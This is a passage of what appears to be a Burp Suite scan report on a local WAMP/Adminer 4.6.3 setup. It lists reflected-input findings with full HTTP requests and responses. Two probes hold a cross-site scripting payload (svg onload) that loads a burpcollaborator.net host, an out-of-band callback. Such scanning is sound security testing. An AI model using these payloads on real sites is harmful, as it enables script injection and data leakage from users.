...[SNIP]...
<td class="v">/?phpinfo=-1qw8g47wtwb</td>
...[SNIP]...
19.6. http://localhost/add_vhost [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /add_vhostu4d22ubbo8 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /add_vhostu4d22ubbo8 was not found on this server.</p>
...[SNIP]...
19.7. http://localhost/add_vhost.php [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /add_vhost.php2q9bysqxau HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /add_vhost.php2q9bysqxau was not found on this server.</p>
...[SNIP]...
19.8. http://localhost/add_vhost.php [lang parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The value of the lang request parameter is copied into the application's response.

Request 1

GET /add_vhost.php?lang=englishl33zcun5ai HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Cookie: PHPSESSID=tufmlll3341349udhaahv635hv

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4982
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...
<a href="add_vhost.php?lang=englishl33zcun5ai">
...[SNIP]...
<a href="index.php?lang=englishl33zcun5ai">
...[SNIP]...
19.9. http://localhost/add_vhost.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /add_vhost.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2faycdowl4l1exqvr83lsjus1ktbz6n1bt1hv4msb%5c56burpcollaborator.net'%3e?lang=english HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Cookie: PHPSESSID=tufmlll3341349udhaahv635hv

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:28 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 410
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /add_vhost.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//aycdowl4l1exqvr83lsjus1ktbz6n1bt1hv4msb\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.10. http://localhost/adminer [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /adminerikkv5cv4e8 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:20 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 300
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adminerikkv5cv4e8 was not found on this server.</p>

...[SNIP]...
19.11. http://localhost/adminer/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /admineraps3pk6u1d/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/?lang=czech

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /admineraps3pk6u1d/ was not found on this server.</p>
...[SNIP]...
19.12. http://localhost/adminer/adminer-4.6.3.php [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /adminer/adminer-4.6.3.phph5og0tvy1n HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:05 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adminer/adminer-4.6.3.phph5og0tvy1n was not found on this server.</p>
...[SNIP]...
19.13. http://localhost/adminer/adminer-4.6.3.php [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /adminerjscwhyjcsu/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adminerjscwhyjcsu/adminer-4.6.3.php was not found on this server.</p>
...[SNIP]...
19.14. http://localhost/adminer/adminer-4.6.3.php [adminer_key cookie]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the adminer_key cookie is copied into the application's response.

Request 1

GET /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31fqvbv5pyo8e; adminer_lang=en

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:03:06 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31fqvbv5pyo8e; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ODRkNzRjN2Y5YmE4YzBlZTE0YzVkODZhNzU3MDMzMGI=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
19.15. http://localhost/adminer/adminer-4.6.3.php [adminer_permanent cookie]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the adminer_permanent cookie is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=8kkaorupn9

lang=en&token=271469%3a613140

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:14:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:14:31 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=8kkaorupn9; expires=Sat, 17 Nov 2018 21:14:31 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MWU2ZWVmNmVkZTZlZmMyN2JhMDQxNTIzZmRhNDFkNjM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4492
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM - Adminer</title>
<link re
...[SNIP]...
19.16. http://localhost/adminer/adminer-4.6.3.php [auth%5bdb%5d parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the auth%5bdb%5d request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfc&auth%5bpassword%5d=p8G%21c2e%21P1&auth%5bdb%5d=VICYSKOsugbtl8nvlo

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:11:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:11:15 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDMzMTUyYzU1YzFlOTM3OGY2OTUzYTNlNTBlYjQ0YjM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4503
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
OTM3OGY2OTUzYTNlNTBlYjQ0YjM=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=WVXmekzw&username=FsyZhLfc&db=VICYSKOsugbtl8nvlo&', '14945:960622')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
<input name="auth[db]" value="VICYSKOsugbtl8nvlo" autocapitalize="off">
...[SNIP]...
19.17. http://localhost/adminer/adminer-4.6.3.php [auth%5bdriver%5d parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the auth%5bdriver%5d request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=if12n6mpoth7rrr8db2b98pbgd; adminer_key=ee5a97bb7d42e79ebb4dfad235644413

auth%5bdriver%5d=servera7s2htqtfq&auth%5bserver%5d=hvdhksIt&auth%5busername%5d=SvdSIQmY&auth%5bpassword%5d=g3P%21p0i%21F6&auth%5bdb%5d=qYkgBFYR&auth%5bpermanent%5d=1

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:02:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=c2VydmVyYTdzMmh0cXRmcQ%3D%3D-aHZkaGtzSXQ%3D-U3ZkU0lRbVk%3D-cVlrZ0JGWVI%3D%3A6e7Uou0JbQpEG8uIZzC6UA%3D%3D; expires=Sat, 17 Nov 2018 21:02:38 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-YjNjMDhlYmJlYzBjOTE1MThhYWJiZTM5MWY0NGUwNTg=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4782
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<a href='/adminer/adminer-4.6.3.php?servera7s2htqtfq=hvdhksIt&amp;username=SvdSIQmY&amp;db=qYkgBFYR&amp;servera7s2htqtfq=hvdhksIt'>
...[SNIP]...
19.18. http://localhost/adminer/adminer-4.6.3.php [auth%5bserver%5d parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the auth%5bserver%5d request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=bp3upadpsu2m2m0t3rkbiuh4ip; adminer_key=a29b0ef6b673e85bda436f5358e30b8b

auth%5bdriver%5d=server&auth%5bserver%5d=gPsfQieMnyafu0bl60&auth%5busername%5d=wWXwJEEF&auth%5bpassword%5d=x6D%21r9q%21H5&auth%5bdb%5d=AhfDADgK&auth%5bpermanent%5d=1

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:04:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:04:15 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-YzMzMGU1YTU0YTYzOWMxNmE1MDZlZWU4YThkMGQ5YWY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4523
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieMnyafu0bl60 - Adminer</title>
...[SNIP]...
script nonce="YzMzMGU1YTU0YTYzOWMxNmE1MDZlZWU4YThkMGQ5YWY=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=gPsfQieMnyafu0bl60&username=wWXwJEEF&db=AhfDADgK&', '271915:612690')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
<
...[SNIP]...
<input name="auth[server]" value="gPsfQieMnyafu0bl60" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
...[SNIP]...
19.19. http://localhost/adminer/adminer-4.6.3.php [auth%5busername%5d parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the auth%5busername%5d request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfcyzmzsuuj7b&auth%5bpassword%5d=p8G%21c2e%21P1&auth%5bdb%5d=VICYSKOs

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:08:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:08:16 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDM4NzI4NTgzOGFlYTE3ZTkyNDY2ZmZiNTY5YTM4ZTc=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4505
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
NzI4NTgzOGFlYTE3ZTkyNDY2ZmZiNTY5YTM4ZTc=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=WVXmekzw&username=FsyZhLfcyzmzsuuj7b&db=VICYSKOs&', '670762:306725')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
<input name="auth[username]" id="username" value="FsyZhLfcyzmzsuuj7b" autocapitalize="off">
...[SNIP]...
19.20. http://localhost/adminer/adminer-4.6.3.php [db parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the db request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgKx3on59zwuj HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=

lang=en&token=271469%3a613140

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:07:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:07:41 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:07:41 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MjhmYTZjM2JmNDBhMGVhMGQzMDA4YzBmYTE3MDBjZmU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4505
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM - Adminer</title>
<link re
...[SNIP]...
MGVhMGQzMDA4YzBmYTE3MDBjZmU=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.3', 'adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgKx3on59zwuj&', '952081:260200')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
...[SNIP]...
<input name="auth[db]" value="AhfDADgKx3on59zwuj" autocapitalize="off">
...[SNIP]...
19.21. http://localhost/adminer/adminer-4.6.3.php [lang parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The value of the lang request parameter is copied into the application's response.

Request 1

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang='%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2fc6jfwyt6t3mzyxzabn0l2u9m1d78vznnfd35qvek%5c56burpcollaborator.net'%3e&token=240285%3a176068

Response 1

HTTP/1.1 200 OK
Date: Fri, 19 Oct 2018 17:06:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZDZjODNmMGJhMzU4MDRlOWM5NTczZWE0ZDkwOTMwYTk=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4650
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<input type="hidden" name="lang" value="&#039;&quot;&gt;&lt;svg/onload=(new(Image)).src=&#039;//c6jfwyt6t3mzyxzabn0l2u9m1d78vznnfd35qvek\56burpcollaborator.net&#039;&gt;">
...[SNIP]...
19.22. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

